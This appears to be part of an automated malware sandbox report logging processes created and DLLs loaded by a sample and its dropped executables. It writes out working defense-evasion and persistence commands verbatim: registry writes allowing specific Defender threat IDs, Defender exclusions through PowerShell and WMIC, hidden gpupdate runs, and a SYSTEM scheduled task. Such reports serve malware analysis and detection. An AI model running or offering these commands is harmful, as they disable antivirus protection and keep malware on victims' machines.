                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
                  Source: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfileJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe .\Install.exe /odidum "385118" /S
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeSection loaded: icu.dllJump to behavior
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dllJump to behavior
